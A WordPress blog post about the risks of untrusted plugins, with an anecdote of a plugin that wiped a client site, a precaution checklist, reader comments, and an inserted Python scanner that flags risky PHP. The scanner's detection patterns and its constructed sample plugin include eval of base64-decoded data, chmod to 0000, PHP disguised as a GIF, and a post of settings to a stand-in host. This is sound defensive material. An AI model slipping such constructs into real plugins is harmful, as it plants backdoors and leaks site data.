Plugins – “Use at Your Own Risk!”

Ok, so the title is a little dramatic and a lot paranoid. But you should ALWAYS keep it in mind when you install a new plugin on your WordPress site.

When you install a new plugin, or even a theme for that matter, you put 100% of your trust in the programmer. Plugin code runs as part of WordPress itself, with the same access to your database and files, so you open your world up to whatever they decide is the right way to do things, or whatever they think it is that you really need to be able to do. Now I trust a lot of people, but I don’t trust anyone 100%! The human race as a whole can be very… well, I’ll stop there. I just don’t trust anyone 100%. I don’t even trust myself 100% most of the time (maybe 98.7% on a good day).

Before you go recommending a good therapist, let me explain my reasoning just a little. Not enough to scare the hell out of you so that you never add another plugin in your life, but just enough to make you think twice before hitting the Install and Activate button.

Plugins (and for the sake of the rest of the article, themes are included in this) are programming code. A programmer sat down at his/her computer and typed up a super, duper, handy, dandy plugin for the world to use. That is great! Plugins can be very helpful. But what if that programmer doesn’t really know what they are doing? Or “they know just enough to be dangerous” – a term I always thought was pretty accurate. They know how to do some things, and they know how to copy and paste code to do the things they don’t. But where did they get the code that they copied and pasted? Who wrote it? Was it off some snippet on a page that talked about hacking a server, or was it posted by a guy (or girl) who hates WordPress and is going to show the world? Who knows. That is how even the most well-intentioned programmer sometimes goes wrong. If you don’t know the programmer who is releasing the code, how much do you trust the person he/she got “some” of that code from? Did he/she actually know what they were doing? Who the heck knows – and that is scary! I don’t know them from Adam, and you want me to trust them with MY site? Hell no!

Scary when you really think about it, I know. To show just how scary, I’ll share a little story that happened to me not too long ago:

I had been using a certain plugin for some time that helps to do something useful for clients’ sites (I’ll leave out the name to protect the innocent). Generally, when I add a new install of WP to a server, I add all the plugins and themes to the correct folders and then upload everything to the server all at once. Then I install them only if I need them, and I delete the ones I don’t need for that specific site. Well, I knew that this plugin had been upgraded recently, so I brought up the ol’ Google site and typed in my search, picked the first result on the list without much thought, downloaded the plugin, and added it to my WP install files, which I uploaded to the client server.

It wasn’t until about a day later that I realized what I had done – but at that point it was too late! The very second I activated it, the site froze up. Not only did it freeze up, but it erased the database, erased many core WordPress files and proceeded to delete all the contents of the wp-content folder!

Ok, I said, what the F#&%^*! I then proceeded to log into the site via FTP and found out that the beautifully crafted, very helpful plugin had also reset the folder permissions on the root, so I could not even get into the site to make any changes! Long story somewhat short, I had to wipe the whole thing and start over. Me. Someone who does this for a living. Burned – and left with an even lower trust level in the rest of the world than before, if that is even possible.

Yes, that really did happen! And yes, I was really p-d off! I can assure you that it will not happen again. I check ALL plugins before I install them, and I now test every new plugin on a development site before I add it to a live site. It goes to show that even those who know what they are doing can get caught in the trap.

Now, I am not saying that this will happen to everyone. But anyone who goes searching around the web looking for that ‘perfect’ plugin, or installs dozens of plugins just to see how they work or what they do, will be burned eventually if they don’t take certain precautions. Here is a simple checklist of items that could help save your site – and your sanity. Keep in mind that ALL plugins and themes are “Use at your own risk”! If you truly understand that, then continue on:

  1. Before you think about adding a plugin or theme – BACK UP YOUR DATABASE! Yes, BACK UP YOUR DATABASE! Oh, and did I mention, BACK UP YOUR DATABASE? And don’t just back it up, DOWNLOAD the backup as well. If malicious code wipes your content folder, a backup stored inside that folder gets wiped along with it, so download it or email it to yourself. A good backup plugin for WordPress is WP DB Backup – it has been downloaded almost 400,000 times, has a good ranking, and I personally have used it on over 100 sites, including my own.
  2. Whenever possible, download plugins only from WordPress.org. You are less likely to have problems, because the plugins have already been downloaded and tested by others.
  3. If you get them from WordPress.org (or the Add Plugin option in the admin area), look for plugins with a high rating. That means others have used it, and ranked it. Word to the wise – if it has a 100% ranking and it is only ranked by 1 person, that is PROBABLY the plugin creator. I rank my own with 5 stars – so I immediately assume ALL others do the same. The only difference being, I know I can trust myself enough to rank it that way.
  4. If you know how to program – LOOK AT THE CODE! You can sometimes easily spot malicious attempts at killing your site or stealing your information, or at opening a security hole that sucks everything through it, including your monitor and keyboard.
  5. If you don’t know how to program and you want to be extra careful, scan the plugin files with an Anti-Virus or Anti-Malware software first. It won’t hurt.
  6. If you have a development site, test the plugin there first. If not, do a little research on the web: search Google for the plugin name and see if there are complaints about it anywhere, and what they are. If the only complaint you find is that a user hates the color scheme, then you can be pretty sure you’re safe – but if there are 10 complaints about it crashing their site, stay away!
  7. If you have to install a plugin from the web and not WordPress.org, at least make sure you can read the site language before you download the plugin. If not – who knows what you are getting! I can’t tell you how many times… you get the point – I hope.

If you get to that point and you have activated the plugin, then this SHOULD be common sense – but you would be surprised. If the plugin requires that you enter PERSONAL information such as a PayPal login AND password (a username alone is required by many plugins and is usually ok), or credit card data, or ANYTHING you feel uncomfortable providing, then DO NOT USE IT! If you can verify 100%, without a doubt, that the information is not being sent to some third party sitting in a lounge chair in Bermuda using your credit card to buy drinks, then go ahead and use it – otherwise, DON’T! Just delete it and move on.
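The “look at the code” and “scan the files” items in the checklist above, and the point about plugins that want your credentials, can be turned into a quick pre-activation triage. The script below is an added example written for this post; it is not the author’s code and not any real plugin. It walks an unpacked plugin folder and flags PHP constructs that deserve a manual read: dynamic code execution, obfuscation, shell calls, destructive file and database calls (the kind that erased the site in the story), outbound network calls (where data you type into a settings page could leave the server), payment-credential prompts, and PHP tags hiding in non-PHP files. The indicator list, the `sample-plugin` folder it scans, and the `example.invalid` host are all assumptions constructed for the example. A hit means “read this line before you click Activate”, not “this is malicious”; honest plugins use some of these calls too.

```python
"""Pre-activation triage of an unpacked WordPress plugin folder.

Added example for this post (not the author's code, not a real plugin). Flags PHP
constructs worth a manual read; a hit is a prompt to review, not proof of malice.
"""
import re
import tempfile
from pathlib import Path

# Indicator patterns are assumptions chosen for this example, not a complete list.
INDICATORS = [
    ("code-exec", re.compile(r"\b(eval|assert|create_function)\s*\(")),
    ("obfuscation", re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
    ("shell", re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(")),
    ("fs-destructive", re.compile(r"\b(unlink|rmdir|chmod|chown|DROP\s+TABLE|TRUNCATE\s+TABLE)\b", re.I)),
    ("network-out", re.compile(r"\b(curl_init|curl_exec|fsockopen|wp_remote_post|wp_remote_get)\s*\(")),
    ("credential-prompt", re.compile(r"paypal|credit\s*card|card\s*number|cvv", re.I)),
]
PHP_EXTENSIONS = {".php", ".phtml", ".inc"}
COMMENT_PREFIXES = ("//", "#", "*", "/*")


def scan_php_source(source, filename="<memory>"):
    """Return one finding per (line, category) hit in a PHP source string."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith(COMMENT_PREFIXES):
            continue  # pure comment lines are skipped here; a full review reads them too
        for category, pattern in INDICATORS:
            match = pattern.search(line)
            if match:
                findings.append({"file": filename, "line": lineno, "category": category,
                                 "match": match.group(0), "code": stripped})
    return findings


def scan_plugin_dir(plugin_dir):
    """Scan every file under plugin_dir; non-PHP files are checked for embedded PHP tags."""
    root = Path(plugin_dir)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        text = path.read_text(encoding="utf-8", errors="replace")
        if path.suffix.lower() in PHP_EXTENSIONS:
            findings.extend(scan_php_source(text, rel))
            continue
        for lineno, line in enumerate(text.splitlines(), 1):
            if "<?php" in line or "<?=" in line:  # PHP inside an "image" or "text" file
                findings.append({"file": rel, "line": lineno, "category": "php-in-nonphp",
                                 "match": "<?php", "code": line.strip()})
                break
    return findings


def summarize(findings):
    """Count findings per category, e.g. {'code-exec': 1, ...}."""
    counts = {}
    for finding in findings:
        counts[finding["category"]] = counts.get(finding["category"], 0) + 1
    return counts


# Constructed sample plugin: one clean file, one file with lines a reviewer should
# read twice, and a "GIF" that is really PHP. Not a real plugin, not real malware.
SAMPLE_PLUGIN = {
    "sample-plugin.php": (
        "<?php\n"
        "/* Plugin Name: Sample Plugin (constructed for this example) */\n"
        "add_action('init', 'sample_init');\n"
        "function sample_init() { return get_option('sample_opts', array()); }\n"
    ),
    "includes/helper.php": (
        "<?php\n"
        "// constructed lines that a reviewer should read twice\n"
        "$decoded = base64_decode($blob);\n"
        "eval($decoded);\n"
        "chmod($dir, 0000);\n"
        "wp_remote_post('https://example.invalid/collect', array('body' => $settings));\n"
        "add_settings_field('paypal_password', 'PayPal password', 'sample_field');\n"
    ),
    "assets/pixel.gif": "GIF89a\n<?php echo 'not an image'; ?>\n",
}


def write_sample_plugin(dest_dir):
    """Write SAMPLE_PLUGIN under dest_dir/sample-plugin and return that folder."""
    root = Path(dest_dir) / "sample-plugin"
    for rel, content in SAMPLE_PLUGIN.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return root


def run_sample_scan():
    """Scan the constructed sample in a temp dir; returns (findings, per-category counts)."""
    with tempfile.TemporaryDirectory() as tmp:
        findings = scan_plugin_dir(write_sample_plugin(tmp))
    return findings, summarize(findings)


if __name__ == "__main__":
    found, counts = run_sample_scan()
    for f in found:
        print(f"{f['file']}:{f['line']} [{f['category']}] {f['code']}")
    print("summary:", counts)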

Remember – plugins can be a good thing if you take precautions to make sure they are legitimate. Otherwise, you might as well turn the keys to your new car over to the 18-year-old mailman, just in case he ever needs to move your car to deliver the mail while you’re out of town for two months. Use COMMON SENSE!



2 Responses to “Plugins – “Use at Your Own Risk!””

  1. Byron says:

    Hi Don,

    You are exactly right…a hacker can do some really malicious stuff with a plugin. I would expect that even the stuff in the WordPress.org plugins directory might be vulnerable to someone with bad intentions, though as you say, a little less likely than out on the open web. I’d like to think that they have some sort of magical code scanner that will reject any malicious code, but if they did, they probably would have sold that code for many millions of dollars and retired.

    As a plugin developer myself, I worry about how I might inadvertently be exposing my users to attacks, particularly since my plugin allows people to upload images and forms to your WordPress blog and displays them in galleries, etc.

    Uploads are particularly dangerous.

    That said, I look at a couple of things when choosing plugins:
    1) Is this plugin being released by a Company that has something to lose if their reputation gets tarnished by malicious code?
    2) How many downloads (as reported by WordPress.org – not the plugin’s site) are there? The more downloads, the safer I feel.
    3) How many plugins has this author released, and how many downloads of his other plugins?

    Those are some lazy precautions that folks can take pretty easily.

    BTW, thanks for chiming in on the Pay for Plugins post over on WebLogToolsCollection…it is a little disheartening to see how little some people value the time, efforts, and skills of plugin developers.

    Best regards,
    Byron

    • dfischer says:

      Byron,
      Thanks for the input! Those are some great “basic” best practices that everyone can easily do – developer or not. As it is said – better safe than sorry – because safe only takes two extra minutes but sorry takes a whole hell of a lot of time to fix.

      While reading the comments on the Pay for Plugins post, I was just surprised at how many people immediately acted like all Plugins were going to become Pay plugins overnight. I’m sure the tables would turn if they were the ones that needed to provide the support – I would bet there would be a huge reversal of opinion. It is so easy to forget that if you have a problem, your one little question to the developer seems like nothing – but add up all the little problems or questions and it can become a full time, non-paying job.

      I know the grass on both sides of the fence – and there are always brown patches – no matter what side you are on. I currently have no “Pay” Plugins, but I have tossed around the idea many times over the past month or two. As my plugins become more popular, it becomes harder and harder to provide the support I would like to provide. I’ve been fortunate in the amount of donations I get, but in reality, the amount of time it takes to develop and support them makes the return equal out to about $0.35 /hour for my time… ask a plugin user if they are willing to work for that, and chances are the answer is no.

      Warm regards,
      Don
